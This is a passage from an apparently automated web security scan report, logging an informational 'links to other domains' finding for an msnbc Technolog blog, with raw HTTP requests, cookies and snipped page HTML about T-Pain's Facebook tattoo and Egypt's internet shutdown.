GET /_news/2011/01/28/5942663-t-pains-facebook-tattoo-so-hardcore-its-hexacore/?GT1=43001 HTTP/1.1
Host: technolog.msnbc.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: jt_time=1296350377678; CULTURE=EN-US; s_sq=%5B%5BB%5D%5D; Sample=69; P1=01||,USDC0001|1||WRC|||||||; MC1=V=3&GUID=b712e24ec89448628a94536a58b96d32; P2=pi6=20026; s_cc=true; CC=US; TZM=-360; MUID=DC63BAA44C3843F38378B4BB213E0A6F; s_nr=1294942856289-Repeat; mh=MSFT; SRCHHPGUSR=AS=1; v1st=F66AF379BC0B14B4; ATC_ID=173.193.214.243.1295383441535041; __qca=P0-161320755-1294800573610; expid=id=8ff810466a3d46f787eed9b654c5ca3f&bd=2011-01-08T02:46:15.800&v=2;

Response

HTTP/1.1 302 Moved Temporarily
Server: Apache/2.2.9 (Debian)
TCN: choice
P3P: CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Location: http://technolog.msnbc.redacted/_news/2011/01/28/5942663-t-pains-facebook-tattoo-so-hardcore-its-hexacore?GT1=43001
Content-Type: text/html
Cache-Control: max-age=291
Date: Sun, 30 Jan 2011 02:19:32 GMT
Connection: close

<!DOCTYPE HTML>
<html lang="en"><head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<meta http-equiv="X-UA-Compatible" content="IE=8;IE=9" />
<title>Technolog - T-Pain's Face
...[SNIP]...
<link rel="alternate" type="application/rss+xml" title="RSS" href="http://technolog.msnbc.redacted/_feeds/rss2/author" />
<link class="cpk_remote" rel="stylesheet" type="text/css" href="http://yui.yahooapis.com/combo?2.8.0r4/build/button/assets/skins/sam/button.css&2.8.0r4/build/container/assets/skins/sam/container.css" />
<script class="cpk_remote" language="javascript" type="text/javascript" src="http://yui.yahooapis.com/combo?2.8.1/build/utilities/utilities.js&2.8.1/build/button/button-min.js&2.8.1/build/container/container-min.js&2.8.1/build/cookie/cookie-min.js&2.8.1/build/selector/selector-min.js&2.8.1/build/event-delegate/event-delegate-min.js&2.8.1/build/json/json-min.js"></script>
<script class="cpk_remote" language="javascript" type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/jquery/1.4.3/jquery.min.js"></script>
<script class="cpk_remote" language="javascript" type="text/javascript" src="http://www.polls.newsvine.com/_util/quicktags/v131.js?v=2"></script>
<script class="cpk_remote" language="javascript" type="text/javascript" src="http://www.polls.newsvine.com/_util/tiny_mce/tinymce_3_3_9_2/tiny_mce.js"></script>
<script class="cpk_remote" language="javascript" type="text/javascript" src="http://www.polls.newsvine.com/_vine/js/pierre?v=2643&lib=jquery&addwidgets=zinger,wetbar"></script>
<link class="cpk_static" rel="stylesheet" type="text/css" href="http://www.polls.newsvine.com/_static/css/39f49614ef57bfa39918e852b69f13f139a7e311.css?v=23247" />
<script class="cpk_static" language="javascript" type="text/javascript" src="http://www.polls.newsvine.com/_static/js/9d030b901f826a71aa88c354332b97d68143daaf.js?v=23247"></script>
<link class="cpk_dynamic" rel="stylesheet" type="text/css" href="http://www.polls.newsvine.com/_static/css/e89cb27add8a8bec4ff014077d76236c84e0ee2e.css?v=23247" />
<script class="cpk_dynamic" language="javascript" type="text/javascript" src="http://www.polls.newsvine.com/_static/js/895677dfabd5df38e5ee57c63c4a6f9ac2e2fff9.js?v=23247"></script>
<link class="cpk_chrome" rel="stylesheet" type="text/css" href="http://lib.newsvine.com/chrome/abstractmartinblog/base.css?v=23247" />
<link class="cpk_chrome" rel="stylesheet" type="text/css" href="http://lib.newsvine.com/chrome/abstractmartinblog/style.css?v=23247" />
<link class="cpk_chrome" rel="stylesheet" type="text/css" href="http://lib.newsvine.com/chrome/technolog/style.css?v=23247" />
<script class="cpk_chrome" language="javascript" type="text/javascript" src="http://lib.newsvine.com/chrome/abstractmartinblog/chrome.js?v=23247"></script>
...[SNIP]...
<div class="pokeDiv"><img id="poke" src="http://log.newsvine.com/poke.gif?x=0|26&amp;get=c5942663&amp;rand=835004959&amp;do=msnbc.redacted&amp;ad=53:9:80;44::;56:27:108;53:9:80;86:86:270;87:87:209;50::" alt="" width="0" height="0" /></div>
...[SNIP]...
<li class="i1 hotmail"><a href="http://www.hotmail.com">Hotmail</a>
...[SNIP]...
<li class="i2 more">
               <a href="http://www.hotmail.com">More</a>
...[SNIP]...
<li class="i7"><a href="http://www.delish.com/">Delish</a>
...[SNIP]...
<li class="i9"><a href="http://msn.whitepages.com/">White Pages</a>
...[SNIP]...
<li class="i14"><a href="http://www.bing.com/shopping?FORM=SHOPH2">Shopping</a>
...[SNIP]...
<li class="i18"><a href="https://secure.opinionlab.com/ccc01/o.asp?ID=WpkpVtTB" target="_blank">Feedback</a>
...[SNIP]...
<li class="i19"><a href="http://www.bing.com/maps/default.aspx?FORM=MSNNAV">Maps &amp; Directions</a>
...[SNIP]...
<li class="i20"><a href="http://www.bing.com/travel/?cid=msn_nav_more&amp;FORM=MSNNAV ">Travel</a>
...[SNIP]...
<li id="bing" class="i3 bing"><a href="http://www.bing.com"><span>
...[SNIP]...
<li class="i2 show-today"><a href="http://today.msnbc.com/">TODAY</a></li>
           <li class="i3 show-nightly"><a href="http://nightly.msnbc.com/">Nightly News</a>
...[SNIP]...
<li class="i4 show-mtp"><a href="http://mtp.msnbc.com/">Meet the Press</a>
...[SNIP]...
<li class="i5 show-dateline"><a href="http://dateline.msnbc.com/">Dateline</a>
...[SNIP]...
<li class="i6 show-maddow"><a href="http://rachel.msnbc.com/">Maddow</a>
...[SNIP]...
<li class="i8 show-hardball"><a href="http://hardball.msnbc.com/">Hardball</a>
...[SNIP]...
<li class="i9 show-msnbc"><a href="http://tv.msnbc.com/">msnbc tv</a>
...[SNIP]...
<li class="i10 site-newsvine"><a href="http://www.newsvine.com/">Newsvine</a>
...[SNIP]...
<li class="i11 site-everyblock"><a href="http://www.everyblock.com/">EveryBlock</a>
...[SNIP]...
<li class="email_subscribe_option"><a href="https://www.newsvine.com/_nv/accounts/msnbc/emailAlerts?affiliate=msnbc.redacted"><img src="http://lib.newsvine.com/chrome/abstractmartinblog/images/icons-email.png" width="19" height="18" alt="Icons Email"> Receive e-mail updates</a>
...[SNIP]...
</div><a href="https://www.newsvine.com/_nv/accounts/msnbc/emailAlerts?affiliate=msnbc.redacted">change this</a>
...[SNIP]...
<div class="spinner hide"><img src="http://www.polls.newsvine.com/_vine/images/__/spinner.gif" width="16" height="16" alt="Loading" /> Saving...</div>
...[SNIP]...
<a href="http://technolog.msnbc.redacted/_feeds/rss2/author"><img src="http://lib.newsvine.com/chrome/abstractmartinblog/images/icons-feed.png" width="18" height="18" alt="Icons Feed"> Subscribe to RSS</a>
...[SNIP]...
<div class="vine-p vine_data_M2_LayoutPrinter vine_data_M2_FlexiblePrinter p-widgets_FBLike">
<iframe src="http://www.facebook.com/plugins/like.php?layout=button_count&amp;show_faces=false&amp;width=90&amp;action=like&amp;colorscheme=light&amp;href=http://www.facebook.com/pages/Technolog/108546889203630" scrolling="no" frameborder="0" allowTransparency="true" style="border:none; overflow:hidden; width:90px; height:20px"></iframe>
...[SNIP]...
<!-- SiteCatalyst code version: G.9. Copyright 1997-2004 Omniture, Inc. More info available at http://www.omniture.com -->
<script src="http://www.polls.newsvine.com/_vine/js/msnbc/std.js?v=23247"></script>
...[SNIP]...
</script><script src="http://www.polls.newsvine.com/_vine/js/msnbc/s_code.js?v=23247"></script>
...[SNIP]...
<div id="vine-inlinePhoto__5942669" data-contentId="5942669" class="inlinePhoto photo_portrait photo_align_block user_inline_photo" style="width:600px;"><img id="helenaspopkin/5942669.jpg" src="http://www.polls.newsvine.com/_vine/images/users/600/helenaspopkin/5942669.jpg" width="600" height="672" alt="" /><p class="photo_credit">
...[SNIP]...
<p>Anyhoo &hellip; T-Pain really likes Facebook too &hellip; at least his latest tattoo indicates such. The Grammy-winning hip-hop artist shared a picture of his new ink on Twitter today, <a href="http://twitter.com/#!/NBTPAIN/status/30855244816584704">with this explanation </a>
...[SNIP]...
<div id="vine-inlinePhoto__5942671" data-contentId="5942671" class="inlinePhoto photo_portrait photo_align_block user_inline_photo" style="width:238px;"><img id="helenaspopkin/5942671.jpg" src="http://www.polls.newsvine.com/_vine/images/users/600/helenaspopkin/5942671.jpg" width="238" height="320" alt="" /><!-- end5942671 -->
...[SNIP]...
</param><embed src="http://www.youtube.com/v/w0nFpwPuk8E&amp;hl=en_US&amp;fs=1" type="application/x-shockwave-flash" allowscriptaccess="always" allowfullscreen="true" width="600" height="429"></embed>
...[SNIP]...
<em>Helen A.S. Popkin writes about the Internet ... a lot. Follow&nbsp;her on <a href="http://twitter.com/helenaspopkin"><span>
...[SNIP]...
</a> and/or <a href="http://www.facebook.com/pages/manage/#!/pages/Helen-AS-Popkin/120508047967128"><span>
...[SNIP]...
<div class="tweetbutton"><a href="http://twitter.com/share" class="twitter-share-button" data-count="horizontal" data-via="msnbc_tech" data-related="breakingnews:The fastest breaking news on Twitter." data-url="http://technolog.msnbc.redacted/_news/2011/01/28/5942663-t-pains-facebook-tattoo-so-hardcore-its-hexacore" data-Text="T-Pain's Facebook tattoo so hardcore, it's hexacore!">Tweet</a><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
<div class="vine-p vine_data_M2_LayoutPrinter vine_data_M2_FlexiblePrinter p-widgets_FBLike">
<iframe src="http://www.facebook.com/plugins/like.php?layout=standard&amp;show_faces=true&amp;width=480&amp;action=recommend&amp;colorscheme=light&amp;href=http://technolog.msnbc.redacted/_news/2011/01/28/5942663-t-pains-facebook-tattoo-so-hardcore-its-hexacore" scrolling="no" frameborder="0" allowTransparency="true" style="border:none; overflow:hidden; width:480px; height:70px"></iframe>
...[SNIP]...
<div class="normal"><a href="http://biggie2221635.newsvine.com/">biggie-2221635</a>
...[SNIP]...
</div><img class="replybutton" src="http://www.polls.newsvine.com/_vine/images/_/b_reply_mini.gif" width="35" height="12" alt="Reply" /><span class="commentdate">
...[SNIP]...
<div class="newsvine"><a href="http://tyler.newsvine.com/">tyler</a>
...[SNIP]...
<div class="clearfix"><img class="replybutton" src="http://www.polls.newsvine.com/_vine/images/_/b_reply_mini.gif" width="35" height="12" alt="Reply" /></div>
...[SNIP]...
<div class="normal"><a href="http://waynej.newsvine.com/">waynejohn</a>
...[SNIP]...
</div><img class="replybutton" src="http://www.polls.newsvine.com/_vine/images/_/b_reply_mini.gif" width="35" height="12" alt="Reply" /><span class="commentdate">
...[SNIP]...
<div class="normal"><a href="http://Davethedoubter.newsvine.com/">Dave the doubter</a>
...[SNIP]...
</div><img class="replybutton" src="http://www.polls.newsvine.com/_vine/images/_/b_reply_mini.gif" width="35" height="12" alt="Reply" /><span class="commentdate">
...[SNIP]...
<div class="normal"><a href="http://MInOTown.newsvine.com/">M In O Town</a>
...[SNIP]...
</div><img class="replybutton" src="http://www.polls.newsvine.com/_vine/images/_/b_reply_mini.gif" width="35" height="12" alt="Reply" /><span class="commentdate">
...[SNIP]...
<div class="normal"><a href="http://ljrhodes.newsvine.com/">L.J. Rhodes</a>
...[SNIP]...
<div class="clearfix"><img class="replybutton" src="http://www.polls.newsvine.com/_vine/images/_/b_reply_mini.gif" width="35" height="12" alt="Reply" /></div>
...[SNIP]...
<div class="normal"><a href="http://John875667.newsvine.com/">John-875667</a>
...[SNIP]...
</div><img class="replybutton" src="http://www.polls.newsvine.com/_vine/images/_/b_reply_mini.gif" width="35" height="12" alt="Reply" /><span class="commentdate">
...[SNIP]...
<div class="normal"><a href="http://Darthdon.newsvine.com/">Darthdon</a>
...[SNIP]...
</div><img class="replybutton" src="http://www.polls.newsvine.com/_vine/images/_/b_reply_mini.gif" width="35" height="12" alt="Reply" /><span class="commentdate">
...[SNIP]...
<div class="privacytext"><a href="http://www.newsvine.com/_nv/cms/info/privacyPolicy" target="_blank">Newsvine Privacy Statement</a></div><img class="postCommentImage" src="http://www.polls.newsvine.com/_vine/images/_/b_postcomment.gif" /><img class="postingCommentImage" src="http://www.polls.newsvine.com/_vine/images/_/b_posting.gif" /></div>
...[SNIP]...
<div class="newuser">As a new user, you may notice a few temporary content restrictions. <a href="http://www.newsvine.com/_nv/cms/help/newUsers" target="_blank">Click here for more info</a>
...[SNIP]...
<span><img src="http://www.polls.newsvine.com/_vine/images/_/icon_track_mini.gif" width="12" height="12" alt="Start Tracking" title="Add this article to your conversation tracker without commenting on it" />Start Tracking</span>
...[SNIP]...
<span><img src="http://www.polls.newsvine.com/_vine/images/_/icon_stop_mini.gif" width="10" height="10" alt="Stop Tracking" />Stop Tracking</span>
...[SNIP]...
</div><script src="http://content.pulse360.com/42EBFC62-1F4E-11E0-AB70-41F5E4064C68" type="text/javascript"></script>
...[SNIP]...
</div><script src="http://content.pulse360.com/517F9430-C0FA-11DF-831B-94A93FF5047F" type="text/javascript"></script>
...[SNIP]...
<div class="avatar"><a href="http://michaelwann.newsvine.com/"><img class="noborder" src="http://www.polls.newsvine.com/_vine/images/av/60x60/michaelwann-318009268.jpg" width="60" height="60" /></a>
...[SNIP]...
<li class="twitter"><a href="http://twitter.com/MichaelWann">Follow on Twitter</a>
...[SNIP]...
<div class="avatar"><a href="http://technolog2.newsvine.com/"><img class="noborder" src="http://www.polls.newsvine.com/_vine/images/av/60x60/wjrothman-1049670252.jpg" width="60" height="60" /></a>
...[SNIP]...
from Time and the NYT to the notorious tech blog Gizmodo, where he was features editor for three years. He is not an Apple fanboy, but sometimes he is mistaken for one. You can stalk him on Twitter at <a href="http://twitter.com/wjrothman">@wjrothman</a>
...[SNIP]...
<li class="twitter"><a href="http://twitter.com/wjrothman">Follow on Twitter</a>
...[SNIP]...
<div class="avatar"><a href="http://helenaspopkin.newsvine.com/"><img class="noborder" src="http://www.polls.newsvine.com/_vine/images/av/60x60/helenaspopkin-1308146463.jpg" width="60" height="60" /></a>
...[SNIP]...
<li class="twitter"><a href="http://twitter.com/HelenASPopkin">Follow on Twitter</a>
...[SNIP]...
<li class="facebook"><a href="http://www.facebook.com/HelenASPopkin">Become a fan on Facebook</a>
...[SNIP]...
<div class="avatar"><a href="http://suzanne-choney.newsvine.com/"><img class="noborder" src="http://www.polls.newsvine.com/_vine/images/av/60x60/suzanne-choney-604078999.jpg" width="60" height="60" /></a>
...[SNIP]...
<li class="twitter"><a href="http://www.twitter.com/suzannechoney">Follow on Twitter</a>
...[SNIP]...
<div class="avatar"><a href="http://alex-johnson.newsvine.com/"><img class="noborder" src="http://www.polls.newsvine.com/_vine/images/av/60x60/alex-johnson-743865123.jpg" width="60" height="60" /></a>
...[SNIP]...
<li><a href="http://malexj.wordpress.com/">Editor at Large</a>
...[SNIP]...
<li class="follow on twitter"><a href="http://www.twitter.com/MAlexJohnson">Follow on Twitter</a>
...[SNIP]...
<li class="follow on facebook"><a href="http://malexj.tk/6M">Follow on Facebook</a>
...[SNIP]...
<div class="avatar"><a href="http://redtape.newsvine.com/"><img class="noborder" src="http://www.polls.newsvine.com/_vine/images/av/60x60/redtape-920134022.jpg" width="60" height="60" /></a>
...[SNIP]...
<div class="avatar"><a href="http://boyle.newsvine.com/"><img class="noborder" src="http://www.polls.newsvine.com/_vine/images/av/60x60/boyle-747955448.jpg" width="60" height="60" /></a>
...[SNIP]...
<li><a href="http://blogs.discovermagazine.com/badastronomy/">Bad Astronomy</a>
...[SNIP]...
<li><a href="http://www.collectspace.com/">CollectSpace</a>
...[SNIP]...
<li><a href="http://blogs.discovermagazine.com/cosmicvariance/">Cosmic Variance</a>
...[SNIP]...
<li><a href="http://curmudgeons.blogspot.com/">Curmudgeons Corner</a>
...[SNIP]...
<li><a href="http://news.discovery.com/">Discovery News</a>
...[SNIP]...
<li><a href="http://www.dailygrail.com/">The Daily Grail</a>
...[SNIP]...
<li><a href="http://earthsky.org/">EarthSky</a></li><li><a href="http://www.geekpress.com/">GeekPress</a></li><li><a href="http://www.habitablezone.com/space/">Habitable Zone</a>
...[SNIP]...
<li><a href="http://www.hobbyspace.com/">HobbySpace Log</a>
...[SNIP]...
<li><a href="http://www.livescience.com/">LiveScience</a>
...[SNIP]...
<li><a href="http://blogs.discovermagazine.com/loom/">The Loom</a></li><li><a href="http://www.nasawatch.com/">NASA Watch</a></li><li><a href="http://www.nasaspaceflight.com/">NASA Spaceflight</a>
...[SNIP]...
<li><a href="http://www.outofthecradle.net/">Out of the Cradle</a>
...[SNIP]...
<li><a href="http://www.scidev.net/">SciDev.net</a></li><li><a href="http://www.scienceblog.com/cms/index.php">Science Blog</a>
...[SNIP]...
<li><a href="http://www.scienceblogs.com/">ScienceBlogs</a>
...[SNIP]...
<li><a href="http://www.signonsandiego.com/news/blogs/science-quest/">Science Quest</a>
...[SNIP]...
<li><a href="http://www.scientificamerican.com/blog/observations/">SciAm Observations</a>
...[SNIP]...
<li><a href="http://seedmagazine.com/">Seed Magazine</a>
...[SNIP]...
<li><a href="http://science.slashdot.org">Slashdot Science</a>
...[SNIP]...
<li><a href="http://www.space.com/">Space.com</a></li><li><a href="http://www.spacedaily.com/">Spaceflight Now</a>
...[SNIP]...
<li><a href="http://spacefellowship.com/">Space Fellowship</a>
...[SNIP]...
<li><a href="http://www.thespacereview.com/">The Space Review</a>
...[SNIP]...
<li><a href="http://www.transterrestrial.com/">Transterrestrial Musings</a>
...[SNIP]...
<li><a href="http://http://www.universetoday.com/">Universe Today</a>
...[SNIP]...
<li><a href="http://www.unmannedspaceflight.com">Unmanned Spaceflight</a>
...[SNIP]...
<li><a href="http://trueslant.com/milesobrien/">Uplink by Miles O'Brien</a>
...[SNIP]...
<li><a href="http://planetary.org/blog">Planetary Society Blog</a>
...[SNIP]...
<li><a href="http://www.sciencenews.org/">Science News</a>
...[SNIP]...
<li><a href="http://www.popularmechanics.com/">Popular Mechanics</a>
...[SNIP]...
<li><a href="http://www.popsci.com/">Popular Science</a>
...[SNIP]...
<li><a href="http://news.sciencemag.org/scienceinsider/">Science Insider</a>
...[SNIP]...
<li><a href="http://nasaengineer.com/">NASAEngineer.com</a>
...[SNIP]...
<li><a href="http://eurekalert.org/">EurekAlert</a></li><li><a href="http://blogs.nature.com/news/thegreatbeyond/">Nature: The Great Beyond</a>
...[SNIP]...
<li><a href="http://www.spacedaily.com/">Space Daily</a>
...[SNIP]...
<li><a href="http://www.spacepolitics.com">Space Politics</a>
...[SNIP]...
<div class="rawhtml_contents clearer clearfix rawhtml_BlogAuthorPromo"><a href="http://www.thecaseforpluto.com/" title="The Case for Pluto"><img src="http://www.thecaseforpluto.com/cover.jpg" width="85" height="129" align="left" border="0" style="padding:0 10px 10px 0;" /></a>Alan Boyle's first book tells the story of Pluto's ups and downs as well as the discoveries of other dwarf planets in our own solar system and even more alien worlds beyond. <a href="http://www.thecaseforpluto.com/" title="The Case for Pluto">Buy "The Case for Pluto" ...</a>
...[SNIP]...
<div class="avatar"><a href="http://wbenedetti.newsvine.com/"><img class="noborder" src="http://www.polls.newsvine.com/_vine/images/av/60x60/WBenedetti-689965150.jpg" width="60" height="60" /></a>
...[SNIP]...
<li class="follow winda benedetti on twitter"><a href="http://twitter.com/windabenedetti">follow Winda Benedetti on Twitter</a>
...[SNIP]...
<div class="avatar"><a href="http://toddkenreck.newsvine.com/"><img class="noborder" src="http://www.polls.newsvine.com/_vine/images/av/60x60/toddkenreck-1044151231.jpg" width="60" height="60" /></a>
...[SNIP]...
<li><a href="http://ingame.newsvine.com/">In-Game</a>
...[SNIP]...
<li class="todd kenreck on facebook"><a href="http://www.facebook.com/todd.kenreck">Todd Kenreck on facebook</a>
...[SNIP]...
<li class="todd kenreck on twitter"><a href="https://twitter.com/ToddKenreck">Todd Kenreck on twitter</a>
...[SNIP]...
<div class="avatar"><a href="http://athima-chansanchai.newsvine.com/"><img class="noborder" src="http://www.polls.newsvine.com/_vine/images/av/60x60/athima-chansanchai-1539646533.jpg" width="60" height="60" /></a>
...[SNIP]...
<li><a href="http://redtape.msnbc.com/">Red Tape Chronicles</a>
...[SNIP]...
<a href="http://www.msnbc.redacted/"><img src="http://lib.newsvine.com/chrome/abstractmartinblog/images/msnbc-logo.png" alt="msnbc.com" width="166" height="20"></a>
...[SNIP]...
<li>
                   <a href="http://privacy.microsoft.com/en-us/default.aspx?SU=http://msnbc.redacted/">MSN Privacy</a>
...[SNIP]...
<li>
                   <a href="http://help.live.com/help.aspx?project=tou&amp;mkt=en-us">Legal</a>
...[SNIP]...
</div><link rel="stylesheet" type="text/css" href="http://lib.newsvine.com/Pierre/widgets/wetbar/wetbar.css">
<script type="text/javascript" language="JavaScript">
...[SNIP]...

22.346. http://technolog.msnbc.redacted/_nv/more/section/archive

Summary

Severity:   Information
Confidence:   Certain
Host:   http://technolog.msnbc.redacted
Path:   /_nv/more/section/archive

Issue detail

The page was loaded from a URL containing a query string:

The response contains the following links to other domains:

Request

GET /_nv/more/section/archive?date=2011/1 HTTP/1.1
Host: technolog.msnbc.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: jt_time=1296350377678; CULTURE=EN-US; s_sq=%5B%5BB%5D%5D; Sample=69; P1=01||,USDC0001|1||WRC|||||||; MC1=V=3&GUID=b712e24ec89448628a94536a58b96d32; P2=pi6=20026; s_cc=true; CC=US; TZM=-360; MUID=DC63BAA44C3843F38378B4BB213E0A6F; s_nr=1294942856289-Repeat; mh=MSFT; SRCHHPGUSR=AS=1; v1st=F66AF379BC0B14B4; ATC_ID=173.193.214.243.1295383441535041; __qca=P0-161320755-1294800573610; expid=id=8ff810466a3d46f787eed9b654c5ca3f&bd=2011-01-08T02:46:15.800&v=2;

Response

HTTP/1.1 200 OK
Server: Apache/2.2.9 (Debian)
P3P: CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Content-Type: text/html
Cache-Control: max-age=296
Date: Sun, 30 Jan 2011 02:52:59 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 243531

<!DOCTYPE HTML>
<html lang="en"><head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<meta http-equiv="X-UA-Compatible" content="IE=8;IE=9" />
<title>Technolog</title>
<meta n
...[SNIP]...
<link rel="alternate" type="application/rss+xml" title="RSS" href="http://technolog.msnbc.redacted/_feeds/rss2/author" />
<link class="cpk_remote" rel="stylesheet" type="text/css" href="http://yui.yahooapis.com/combo?2.8.0r4/build/button/assets/skins/sam/button.css&2.8.0r4/build/container/assets/skins/sam/container.css" />
<script class="cpk_remote" language="javascript" type="text/javascript" src="http://yui.yahooapis.com/combo?2.8.1/build/utilities/utilities.js&2.8.1/build/button/button-min.js&2.8.1/build/container/container-min.js&2.8.1/build/cookie/cookie-min.js&2.8.1/build/selector/selector-min.js&2.8.1/build/event-delegate/event-delegate-min.js&2.8.1/build/json/json-min.js"></script>
<script class="cpk_remote" language="javascript" type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/jquery/1.4.3/jquery.min.js"></script>
<script class="cpk_remote" language="javascript" type="text/javascript" src="http://www.polls.newsvine.com/_vine/js/pierre?v=2643&lib=jquery&addwidgets=zinger,wetbar"></script>
<link class="cpk_static" rel="stylesheet" type="text/css" href="http://www.polls.newsvine.com/_static/css/fa8e2c7b4e481656a284f68469c7f35eb684a538.css?v=23247" />
<script class="cpk_static" language="javascript" type="text/javascript" src="http://www.polls.newsvine.com/_static/js/743c08193910d885a9007779422ad8078db6dc9c.js?v=23247"></script>
<link class="cpk_dynamic" rel="stylesheet" type="text/css" href="http://www.polls.newsvine.com/_static/css/ffb30d0d6c6ea0fa18ad06ed093685a55fe064e8.css?v=23247" />
<script class="cpk_dynamic" language="javascript" type="text/javascript" src="http://www.polls.newsvine.com/_static/js/6fcc5bd2a149dc02951529f95ade36053a0ff882.js?v=23247"></script>
<link class="cpk_chrome" rel="stylesheet" type="text/css" href="http://lib.newsvine.com/chrome/abstractmartinblog/base.css?v=23247" />
<link class="cpk_chrome" rel="stylesheet" type="text/css" href="http://lib.newsvine.com/chrome/abstractmartinblog/style.css?v=23247" />
<link class="cpk_chrome" rel="stylesheet" type="text/css" href="http://lib.newsvine.com/chrome/technolog/style.css?v=23247" />
<script class="cpk_chrome" language="javascript" type="text/javascript" src="http://lib.newsvine.com/chrome/abstractmartinblog/chrome.js?v=23247"></script>
...[SNIP]...
<div class="pokeDiv"><img id="poke" src="http://log.newsvine.com/poke.gif?x=0|26&amp;get=martinblog&amp;rand=1695256702&amp;do=msnbc.redacted&amp;ad=53:9:80;44::;56:27:108;58:58:178;58:58:178;58:58:178;53:9:80;86:86:270;87:87:209;50::" alt="" width="0" height="0" /></div>
...[SNIP]...
<li class="i1 hotmail"><a href="http://www.hotmail.com">Hotmail</a>
...[SNIP]...
<li class="i2 more">
               <a href="http://www.hotmail.com">More</a>
...[SNIP]...
<li class="i7"><a href="http://www.delish.com/">Delish</a>
...[SNIP]...
<li class="i9"><a href="http://msn.whitepages.com/">White Pages</a>
...[SNIP]...
<li class="i14"><a href="http://www.bing.com/shopping?FORM=SHOPH2">Shopping</a>
...[SNIP]...
<li class="i18"><a href="https://secure.opinionlab.com/ccc01/o.asp?ID=WpkpVtTB" target="_blank">Feedback</a>
...[SNIP]...
<li class="i19"><a href="http://www.bing.com/maps/default.aspx?FORM=MSNNAV">Maps &amp; Directions</a>
...[SNIP]...
<li class="i20"><a href="http://www.bing.com/travel/?cid=msn_nav_more&amp;FORM=MSNNAV ">Travel</a>
...[SNIP]...
<li id="bing" class="i3 bing"><a href="http://www.bing.com"><span>
...[SNIP]...
<li class="i2 show-today"><a href="http://today.msnbc.com/">TODAY</a></li>
           <li class="i3 show-nightly"><a href="http://nightly.msnbc.com/">Nightly News</a>
...[SNIP]...
<li class="i4 show-mtp"><a href="http://mtp.msnbc.com/">Meet the Press</a>
...[SNIP]...
<li class="i5 show-dateline"><a href="http://dateline.msnbc.com/">Dateline</a>
...[SNIP]...
<li class="i6 show-maddow"><a href="http://rachel.msnbc.com/">Maddow</a>
...[SNIP]...
<li class="i8 show-hardball"><a href="http://hardball.msnbc.com/">Hardball</a>
...[SNIP]...
<li class="i9 show-msnbc"><a href="http://tv.msnbc.com/">msnbc tv</a>
...[SNIP]...
<li class="i10 site-newsvine"><a href="http://www.newsvine.com/">Newsvine</a>
...[SNIP]...
<li class="i11 site-everyblock"><a href="http://www.everyblock.com/">EveryBlock</a>
...[SNIP]...
<li class="email_subscribe_option"><a href="https://www.newsvine.com/_nv/accounts/msnbc/emailAlerts?affiliate=msnbc.redacted"><img src="http://lib.newsvine.com/chrome/abstractmartinblog/images/icons-email.png" width="19" height="18" alt="Icons Email"> Receive e-mail updates</a>
...[SNIP]...
</div><a href="https://www.newsvine.com/_nv/accounts/msnbc/emailAlerts?affiliate=msnbc.redacted">change this</a>
...[SNIP]...
<div class="spinner hide"><img src="http://www.polls.newsvine.com/_vine/images/__/spinner.gif" width="16" height="16" alt="Loading" /> Saving...</div>
...[SNIP]...
<a href="http://technolog.msnbc.redacted/_feeds/rss2/author"><img src="http://lib.newsvine.com/chrome/abstractmartinblog/images/icons-feed.png" width="18" height="18" alt="Icons Feed"> Subscribe to RSS</a>
...[SNIP]...
<div class="vine-p vine_data_M2_LayoutPrinter vine_data_M2_FlexiblePrinter p-widgets_FBLike">
<iframe src="http://www.facebook.com/plugins/like.php?layout=button_count&amp;show_faces=false&amp;width=90&amp;action=like&amp;colorscheme=light&amp;href=http://www.facebook.com/pages/Technolog/108546889203630" scrolling="no" frameborder="0" allowTransparency="true" style="border:none; overflow:hidden; width:90px; height:20px"></iframe>
...[SNIP]...
<!-- SiteCatalyst code version: G.9. Copyright 1997-2004 Omniture, Inc. More info available at http://www.omniture.com -->
<script src="http://www.polls.newsvine.com/_vine/js/msnbc/std.js?v=23247"></script>
...[SNIP]...
</script><script src="http://www.polls.newsvine.com/_vine/js/msnbc/s_code.js?v=23247"></script>
...[SNIP]...
<p>"If you go beyond the weekend, real damage is done to capital flow and banking," Neil Hicks, international policy analyst for <a href="http://www.humanrightsfirst.org/">Human Rights First</a> told msnbc.com, citing a report from the <a href="http://www.eiu.com/public/">Economist Intelligence Unit</a>
...[SNIP]...
<p>It's counterproductive, Hicks explained, citing Secretary of State Hillary Clinton's&nbsp;<a href="http://www.state.gov/secretary/rm/2010/01/135519.htm">January 21 speech on Internet freedom</a>
...[SNIP]...
<p>"We've never had a lab in which to see what percentage of a country's economy relies on the Internet," Jim Cowie, chief technology officer of the global Internet monitoring firm <a href="http://renesys.com/about/index.shtml">Renesys</a>
...[SNIP]...
<em>Catch up with Wilson on Twitter at&nbsp;<a href="http://www.twitter.com/wjrothman">@wjrothman</a>, or join our conversation at the&nbsp;<a href="http://www.facebook.com/technolog">Technolog Facebook page</a>
...[SNIP]...
<div class="tweetbutton"><a href="http://twitter.com/share" class="twitter-share-button" data-count="horizontal" data-via="msnbc_tech" data-related="breakingnews:The fastest breaking news on Twitter." data-url="http://technolog.msnbc.redacted/_news/2011/01/28/5942650-net-less-egypt-may-face-economic-doom-monday" data-Text="Net-less Egypt may face economic doom Monday">Tweet</a><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
<div class="vine-p vine_data_M2_LayoutPrinter vine_data_M2_FlexiblePrinter p-widgets_FBLike">
<iframe src="http://www.facebook.com/plugins/like.php?layout=standard&amp;show_faces=true&amp;width=480&amp;action=recommend&amp;colorscheme=light&amp;href=http://technolog.msnbc.redacted/_news/2011/01/28/5942650-net-less-egypt-may-face-economic-doom-monday" scrolling="no" frameborder="0" allowTransparency="true" style="border:none; overflow:hidden; width:480px; height:70px"></iframe>
